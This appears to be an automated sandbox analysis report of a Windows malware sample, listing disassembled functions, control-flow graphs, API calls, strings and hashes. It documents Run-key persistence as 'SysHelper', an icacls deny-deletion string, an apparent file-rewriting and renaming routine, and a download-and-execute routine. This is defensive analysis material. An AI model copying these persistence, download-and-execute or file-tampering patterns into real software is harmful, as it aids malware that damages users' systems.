                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                                                                    • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                                                                    • _memset.LIBCMT ref: 00412090
                                                                                                                                                    • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                                                                    • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                                                                    • _memset.LIBCMT ref: 00412120
                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                                                                    • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                    • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                    • API String ID: 2589766509-1182136429
                                                                                                                                                    • Opcode ID: b8639d4cb1df11636e2053edd446f9d8629bb06a8c843baf4bbf7f0045448b02
                                                                                                                                                    • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                                                                    • Opcode Fuzzy Hash: b8639d4cb1df11636e2053edd446f9d8629bb06a8c843baf4bbf7f0045448b02
                                                                                                                                                    • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004111C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1067 4111c0-41121d CreateFileW 1068 411223-411232 GetFileSizeEx 1067->1068 1069 4118eb-4118fb 1067->1069 1070 4112a3-4112be VirtualAlloc 1068->1070 1071 411234 1068->1071 1072 4112c0-4112d5 call 42b420 1070->1072 1073 41131a-411331 CloseHandle 1070->1073 1074 411236-41123a 1071->1074 1075 41123c-411281 CloseHandle call 413100 call 4159d0 MoveFileW 1071->1075 1080 4113b1 1072->1080 1081 4112db-4112de 1072->1081 1074->1070 1074->1075 1075->1069 1087 411287-4112a2 call 422587 1075->1087 1085 4113b7-4113ef SetFilePointer 1080->1085 1083 4112e0-4112e3 1081->1083 1084 4112e9-41130a SetFilePointerEx 1081->1084 1083->1080 1083->1084 1088 411332-41134d ReadFile 1084->1088 1089 41130c-411314 VirtualFree 1084->1089 1090 4113f5-41140d ReadFile 1085->1090 1091 4115bf 1085->1091 1088->1089 1094 41134f-411354 1088->1094 1089->1073 1095 411440-411445 1090->1095 1096 41140f-41143f VirtualFree CloseHandle call 412d50 1090->1096 1092 4115c5-4115d9 SetFilePointerEx 1091->1092 1092->1096 1097 4115df-4115eb 1092->1097 1094->1089 1100 411356-411359 1094->1100 1095->1091 1098 41144b-41146b 1095->1098 1102 4115ed-4115fc WriteFile 1097->1102 1103 41160e-411643 call 4130b0 call 412840 1097->1103 1104 411471-4115a8 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40c5c0 call 412d10 call 412d50 call 40bbd0 call 40bd50 call 413ff0 call 412f70 call 40c070 SetFilePointer 1098->1104 1105 411718-4117d9 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40bbd0 call 40bd50 call 412f70 call 40c070 1098->1105 1100->1085 1106 41135b-411377 call 412c40 call 417060 1100->1106 1102->1096 1109 411602-41160b call 422110 1102->1109 1130 411645 1103->1130 1131 411647-41165a WriteFile call 412d50 1103->1131 1185 4117e1-41182e call 412d50 call 412c40 call 412bf0 call 40cba0 1104->1185 1196 4115ae-4115ba call 412d50 * 2 1104->1196 1105->1185 1127 4113a7-4113af call 412d50 1106->1127 1128 411379-411391 VirtualFree CloseHandle call 412d50 1106->1128 1109->1103 1127->1085 1139 411396-4113a6 1128->1139 1130->1131 1131->1096 1145 411660-411680 lstrlenA WriteFile 1131->1145 1145->1096 1146 411686-4116de CloseHandle call 413100 call 4159d0 MoveFileW 1145->1146 1162 4116e4-4116f7 VirtualFree call 413210 1146->1162 1163 4118a7-4118d3 call 413210 call 412d50 1146->1163 1171 4116fc-411717 call 412d50 1162->1171 1183 4118e3-4118e6 1163->1183 1184 4118d5-4118dd VirtualFree 1163->1184 1183->1069 1187 4118e8-4118e9 CloseHandle 1183->1187 1184->1183 1203 411830-411832 1185->1203 1204 41186e-4118a6 VirtualFree CloseHandle call 412d50 * 2 1185->1204 1187->1069 1196->1091 1203->1204 1205 411834-41185b WriteFile 1203->1205 1205->1204 1207 41185d-411869 call 412d50 1205->1207 1207->1092
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00411277
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004112B1
                                                                                                                                                    • _memset.LIBCMT ref: 004112C8
                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00411301
                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411314
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041131B
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00411349
                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00411381
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00411388
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004113E6
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00411409
                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411417
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041141E
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00411471
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00411491
                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004114CF
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0041159D
                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115D0
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115F8
                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00411649
                                                                                                                                                    • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041166B
                                                                                                                                                    • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411678
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0041168D
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 004116D6
                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004116EB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                                                    • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                    • API String ID: 254274740-1186676987
                                                                                                                                                    • Opcode ID: 293c49c6598277702c9a6e154ae3a7bf40a384076c9d9a741040a37d38e83410
                                                                                                                                                    • Instruction ID: 4b60432aefe4dd0e03df0e566fa74873db0e7dc4ed90acce11ed2be1fb3b5442
                                                                                                                                                    • Opcode Fuzzy Hash: 293c49c6598277702c9a6e154ae3a7bf40a384076c9d9a741040a37d38e83410
                                                                                                                                                    • Instruction Fuzzy Hash: E7229F70E00209EBDB10EBA5DC85FEEB7B8EF05304F10416AE519B7291DB785A85CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041DBD0 Relevance: 49.6, APIs: 23, Strings: 5, Instructions: 565networkfilelibraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1412 41dbd0-41dcea call 42f7c0 call 413ff0 call 4156d0 call 413ff0 call 40ecb0 1423 41dcf0-41dd82 LoadLibraryW GetProcAddress call 413c40 UuidCreate UuidToStringA 1412->1423 1424 41e459-41e45f 1412->1424 1442 41dd84-41dd86 1423->1442 1443 41dd88-41dd8d 1423->1443 1426 41e461-41e465 1424->1426 1427 41e498-41e4a0 1424->1427 1431 41e467-41e46b 1426->1431 1432 41e48f-41e495 call 422587 1426->1432 1428 41e4b1-41e4c7 1427->1428 1429 41e4a2-41e4ae call 422587 1427->1429 1429->1428 1435 41e477-41e48d 1431->1435 1436 41e46d-41e474 call 422587 1431->1436 1432->1427 1435->1431 1435->1432 1436->1435 1445 41dd99-41de83 call 4156d0 RpcStringFreeA PathAppendA CreateDirectoryA call 4184e0 call 413ff0 call 412900 call 413580 1442->1445 1444 41dd90-41dd95 1443->1444 1444->1444 1446 41dd97 1444->1446 1457 41de85-41de91 call 422587 1445->1457 1458 41de94-41de99 1445->1458 1446->1445 1457->1458 1459 41e3da-41e3e2 1458->1459 1460 41de9f-41dea3 1458->1460 1463 41e3f3-41e419 1459->1463 1464 41e3e4-41e3f0 call 422587 1459->1464 1462 41dea7-41debc call 414300 1460->1462 1475 41ded0-41df5a call 42b420 InternetOpenA call 413ff0 call 412900 call 421c02 1462->1475 1476 41debe-41dec2 1462->1476 1468 41e41b-41e427 call 422587 1463->1468 1469 41e42a-41e44a 1463->1469 1464->1463 1468->1469 1473 41e455 1469->1473 1474 41e44c-41e452 call 422587 1469->1474 1473->1424 1474->1473 1491 41e031-41e075 call 414690 call 412840 1475->1491 1492 41df60-41df9c call 414690 call 40dd40 1475->1492 1479 41dec4-41dec6 1476->1479 1480 41dec8 1476->1480 1483 41deca-41dece 1479->1483 1480->1483 1483->1475 1503 41e077 1491->1503 1504 41e079-41e08b InternetOpenUrlA 1491->1504 1501 41e014-41e01c 1492->1501 1502 41df9e-41dfa3 1492->1502 1505 41e02d 1501->1505 1506 41e01e-41e02a call 422587 1501->1506 1507 41dfb1-41dfcc 1502->1507 1508 41dfa5-41dfae call 422587 1502->1508 1503->1504 1509 41e08d-41e099 call 422587 1504->1509 1510 41e09c-41e0bc 1504->1510 1505->1491 1506->1505 1515 41dfe7-41dfed 1507->1515 1516 41dfce-41dfd2 1507->1516 1508->1507 1509->1510 1511 41e0e2-41e11b HttpQueryInfoW 1510->1511 1512 41e0be-41e0cb 1510->1512 1511->1512 1523 41e11d-41e15f call 413ff0 call 41e5b0 1511->1523 1520 41e0d1-41e0dd call 422587 1512->1520 1521 41e3c2-41e3cd 1512->1521 1519 41dff3-41e011 1515->1519 1516->1519 1525 41dfd4-41dfe5 call 4205a0 1516->1525 1519->1501 1520->1521 1521->1462 1528 41e3d3 1521->1528 1535 41e161-41e16f 1523->1535 1536 41e174-41e19f call 41e5b0 call 413010 1523->1536 1525->1519 1528->1459 1535->1536 1541 41e1a1-41e1a6 1536->1541 1542 41e1d3-41e1db 1536->1542 1543 41e1b4-41e1ce call 413d40 1541->1543 1544 41e1a8-41e1b1 call 422587 1541->1544 1545 41e1dd-41e1e9 call 422587 1542->1545 1546 41e1ec-41e248 lstrcpyA PathAppendA 1542->1546 1543->1542 1544->1543 1545->1546 1550 41e24a-41e24c 1546->1550 1551 41e24e-41e250 1546->1551 1554 41e25c-41e293 call 4156d0 CreateFileA 1550->1554 1555 41e253-41e258 1551->1555 1559 41e353-41e358 1554->1559 1560 41e299-41e2a9 SetFilePointer 1554->1560 1555->1555 1556 41e25a 1555->1556 1556->1554 1561 41e366-41e380 1559->1561 1562 41e35a-41e363 call 422587 1559->1562 1560->1559 1563 41e2af 1560->1563 1565 41e382-41e38b call 422587 1561->1565 1566 41e38e-41e3b0 1561->1566 1562->1561 1567 41e2b1-41e2cf InternetReadFile 1563->1567 1565->1566 1572 41e3b2-41e3bb call 422587 1566->1572 1573 41e3be 1566->1573 1570 41e2d1-41e2da 1567->1570 1571 41e314 1567->1571 1570->1571 1575 41e2dc-41e303 WriteFile 1570->1575 1577 41e316-41e32e CloseHandle InternetCloseHandle * 2 1571->1577 1572->1573 1573->1521 1575->1577 1578 41e305-41e310 1575->1578 1577->1559 1580 41e330-41e332 1577->1580 1578->1567 1581 41e312 1578->1581 1580->1559 1582 41e334-41e34d ShellExecuteA 1580->1582 1581->1577 1582->1559
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040ECB0: _strtok.LIBCMT ref: 0040ED66
                                                                                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041DCF5
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0041DD01
                                                                                                                                                      • Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83
                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 0041DD3C
                                                                                                                                                    • UuidToStringA.RPCRT4(?,?), ref: 0041DD57
                                                                                                                                                    • RpcStringFreeA.RPCRT4(00000000), ref: 0041DDB4
                                                                                                                                                    • PathAppendA.SHLWAPI(?,00000000), ref: 0041DDD3
                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 0041DDDC
                                                                                                                                                    • _memset.LIBCMT ref: 0041DEE7
                                                                                                                                                    • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0041DEFC
                                                                                                                                                      • Part of subcall function 00412900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0041DF50
                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,00000000), ref: 0041E07B
                                                                                                                                                      • Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DD8D
                                                                                                                                                      • Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DDB6
                                                                                                                                                      • Part of subcall function 0040DD40: _memset.LIBCMT ref: 0040DDE4
                                                                                                                                                      • Part of subcall function 0040DD40: lstrlenW.KERNEL32(?), ref: 0040DE0A
                                                                                                                                                      • Part of subcall function 0040DD40: gethostbyname.WS2_32(00500134), ref: 0040DEA7
                                                                                                                                                    • _memmove.LIBCMT ref: 0041DFDD
                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 0041E10D
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041E229
                                                                                                                                                    • PathAppendA.SHLWAPI(?,?), ref: 0041E23F
                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 0041E288
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E2A0
                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0041E2C7
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0041E2FB
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041E317
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E324
                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0041E32A
                                                                                                                                                    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0041E34D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                                                                                                                                                    • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                                                                                                                                                    • API String ID: 1843630811-800396732
                                                                                                                                                    • Opcode ID: 79f11b5817a4916f5f3d486092be924a08c981b299a8052f569d85f43efcf6a6
                                                                                                                                                    • Instruction ID: dcf8a581e05b5da13000ef7a953c2c15a8b95d2250363c4482f8ef8be3b44f4c
                                                                                                                                                    • Opcode Fuzzy Hash: 79f11b5817a4916f5f3d486092be924a08c981b299a8052f569d85f43efcf6a6
                                                                                                                                                    • Instruction Fuzzy Hash: BF32C070108380EFE730DF25C845B9BBBE4AF85308F10491EF99957291D7BA9589CB9B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1583 412220-41228a call 42f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1586 4122bd-4122d1 K32EnumProcesses 1583->1586 1587 41228c-4122ba LoadLibraryW GetProcAddress * 3 1583->1587 1588 4122d3-4122de 1586->1588 1589 4122df-4122ec 1586->1589 1587->1586 1590 412353-41235b 1589->1590 1591 4122ee 1589->1591 1592 4122f0-412308 OpenProcess 1591->1592 1593 412346-412351 CloseHandle 1592->1593 1594 41230a-41231a K32EnumProcessModules 1592->1594 1593->1590 1593->1592 1594->1593 1595 41231c-412339 K32GetModuleBaseNameW call 420235 1594->1595 1597 41233e-412343 1595->1597 1597->1593 1598 412345 1597->1598 1598->1593
                                                                                                                                                    APIs
                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                                                                    • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                                                                    • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                                                                    • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                                                                    • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                    • API String ID: 3668891214-3807497772
                                                                                                                                                    • Opcode ID: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
                                                                                                                                                    • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                                                                    • Opcode Fuzzy Hash: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
                                                                                                                                                    • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041F130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM ref: 0041F15E
                                                                                                                                                    • Sleep.KERNEL32(?), ref: 0041F185
                                                                                                                                                    • Sleep.KERNEL32(?), ref: 0041F19D
                                                                                                                                                    • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0041F9D0
                                                                                                                                                      • Part of subcall function 00410A50: GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                      • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                                      • Part of subcall function 00410A50: PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                      • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                      • Part of subcall function 00410A50: GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                                                    • String ID: C:\
                                                                                                                                                    • API String ID: 3672571082-3404278061
                                                                                                                                                    • Opcode ID: e2deaf627a7e3b3d51f0c7fa96b976d863de6944f728a2cee6f3c5f3a0c60e18
                                                                                                                                                    • Instruction ID: 5c6d64671d491e840e8d62e2c9f1d443296aa8abdfe0033865403ad230f1735f
                                                                                                                                                    • Opcode Fuzzy Hash: e2deaf627a7e3b3d51f0c7fa96b976d863de6944f728a2cee6f3c5f3a0c60e18
                                                                                                                                                    • Instruction Fuzzy Hash: C842B171E003059BDF24DFA8C885BDEB7B1BF44308F14452EE805AB381D779A98ACB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
